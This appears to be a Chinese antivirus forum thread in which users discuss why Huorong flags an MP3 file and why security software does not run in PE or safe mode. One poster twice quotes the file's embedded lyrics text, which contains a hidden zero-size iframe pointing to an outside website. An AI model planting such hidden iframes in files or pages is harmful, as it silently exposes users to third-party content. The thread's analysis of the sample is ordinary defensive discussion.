楼主: dmgcx
收起左侧

[可疑文件] 火绒将mp3报毒

[复制链接]
ziyerain2015
发表于 2018-11-11 10:27:00 | 显示全部楼层
蜘蛛 JS.IFrame.609
小鱼桐
发表于 2018-11-11 11:50:58 | 显示全部楼层
火绒工程师 发表于 2018-11-11 10:17
您好,火绒目前不能在pe下运行呢

为什么不弄成支持PE呢:(
www-tekeze
发表于 2018-11-11 12:03:28 | 显示全部楼层
小鱼桐 发表于 2018-11-11 11:50
为什么不弄成支持PE呢:(

别说PE,安全模式下也没几家能支持,杀软都需要系统的服务支持。
也就是说只有系统服务正常工作,杀软也才能正常工作。。
记录微笑
发表于 2018-11-11 12:09:22 | 显示全部楼层
www-tekeze 发表于 2018-11-11 12:03
别说PE,安全模式下也没几家能支持,杀软都需要系统的服务支持。
也就是说只有系统服务正常工作,杀软也 ...

安全模式除了企业级的杀软,像sep,其他个人级杀软都被设计成不会启动。不然如果安装出问题,导致一开机就蓝屏的话,修复就很麻烦。
www-tekeze
发表于 2018-11-11 12:28:57 | 显示全部楼层
whl2606555 发表于 2018-11-11 12:09
安全模式除了企业级的杀软,像sep,其他个人级杀软都被设计成不会启动。不然如果安装出问题,导致一开机 ...

是的,他说那种只是PE下的专杀工具,因为PE里正常程序、病毒木马、恶意驱动等等,都已停止运行,完全没有对抗能力,就是磁盘上的一个普通文件而已,专杀工具只要存入了特征码,扫描比对后就可以查杀。
正常情况哪有他想的那么简单。。
松竹承茂
发表于 2018-11-11 13:17:25 | 显示全部楼层
191196846 发表于 2018-11-11 08:42
用记事本打开,看看最后有没有嵌入一个网址

陈淑桦                        精选                          1999音乐风云网(music.fengyun.net)
<iframe src="http://www.idiw.cn" width="0" height="0" frameborder="0"></iframe>
LYRICSBEGININD00003110LYR00943[ti:梦醒时分]
[ar:郑中基]
[al:]
[by:逍遥客]

[00:-0.50]歌曲: 梦醒时分
[00:14.50]演唱:郑中基
[00:29.50]歌词编辑:逍遥客
[01:49.50][00:45.34]你说你爱了不该爱的人
[01:52.70][00:48.70]你的心中满是伤痕
[01:56.03][00:51.95]你说你犯了不该犯的错
[01:59.64][00:55.68]心中满是悔恨
[02:03.04][00:58.97]你说你尝尽了生活的苦
[02:06.47][01:02.65]找不到可以相信的人
[02:09.78][01:05.73]你说你感到万分沮丧
[02:13.12][01:09.15]甚至开始怀疑人生
[03:00.00][02:17.08][01:13.29]早知道伤心总是难免的
[03:03.50][02:21.66][01:18.16]你又何苦一往情深
[03:06.70][02:25.06][01:21.58]因为爱情总是难舍难分
[03:10.16][02:28.64][01:24.91]何必在意那一点点温存
[03:13.50][02:32.21][01:28.29]要知道伤心总是难免的
[03:17.00][02:35.60][01:31.73]在每一个梦醒时分
[03:19.94][02:38.99][01:35.01]有些事情现在不必问
[03:23.71][02:42.80][01:38.56]有些人你永远不必等
[02:48.90]>>>音乐<<<
[03:41.10]>>>基仔弹奏吉它中<<<




















000973LYRICS200
松竹承茂
发表于 2018-11-11 13:18:25 | 显示全部楼层
www-tekeze 发表于 2018-11-11 12:28
是的,他说那种只是PE下的专杀工具,因为PE里正常程序、病毒木马、恶意驱动等等,都已停止运行,完全没有 ...

陈淑桦                        精选                          1999音乐风云网(music.fengyun.net)
<iframe src="http://www.idiw.cn" width="0" height="0" frameborder="0"></iframe>
LYRICSBEGININD00003110LYR00943[ti:梦醒时分]
[ar:郑中基]
[al:]
[by:逍遥客]

[00:-0.50]歌曲: 梦醒时分
[00:14.50]演唱:郑中基
[00:29.50]歌词编辑:逍遥客
[01:49.50][00:45.34]你说你爱了不该爱的人
[01:52.70][00:48.70]你的心中满是伤痕
[01:56.03][00:51.95]你说你犯了不该犯的错
[01:59.64][00:55.68]心中满是悔恨
[02:03.04][00:58.97]你说你尝尽了生活的苦
[02:06.47][01:02.65]找不到可以相信的人
[02:09.78][01:05.73]你说你感到万分沮丧
[02:13.12][01:09.15]甚至开始怀疑人生
[03:00.00][02:17.08][01:13.29]早知道伤心总是难免的
[03:03.50][02:21.66][01:18.16]你又何苦一往情深
[03:06.70][02:25.06][01:21.58]因为爱情总是难舍难分
[03:10.16][02:28.64][01:24.91]何必在意那一点点温存
[03:13.50][02:32.21][01:28.29]要知道伤心总是难免的
[03:17.00][02:35.60][01:31.73]在每一个梦醒时分
[03:19.94][02:38.99][01:35.01]有些事情现在不必问
[03:23.71][02:42.80][01:38.56]有些人你永远不必等
[02:48.90]>>>音乐<<<
[03:41.10]>>>基仔弹奏吉它中<<<




















000973LYRICS200
小鱼桐
发表于 2018-11-11 13:37:05 | 显示全部楼层
www-tekeze 发表于 2018-11-11 12:28
是的,他说那种只是PE下的专杀工具,因为PE里正常程序、病毒木马、恶意驱动等等,都已停止运行,完全没有 ...

PE扫描文件里面的特征码,然后查杀,这样不行?
www-tekeze
发表于 2018-11-11 14:06:34 | 显示全部楼层
小鱼桐 发表于 2018-11-11 13:37
PE扫描文件里面的特征码,然后查杀,这样不行?

特征码得事先存进去吧,那携带的病毒库会非常非常大,几百MB,所以不用来查杀普通的病毒木马,只会制成专杀工具,查杀特殊种类的,比如Rootkit、Bootkit、恶意驱动等。。。现在云杀很普遍了,PE下怎么发挥?
小鱼桐
发表于 2018-11-11 15:39:04 | 显示全部楼层
www-tekeze 发表于 2018-11-11 14:06
特征码得事先存进去吧,那携带的病毒库会非常非常大,几百MB,所以不用来查杀普通的病毒木马,只会制成专 ...

云杀是算文件md5?
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-28 22:00 , Processed in 0.098958 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表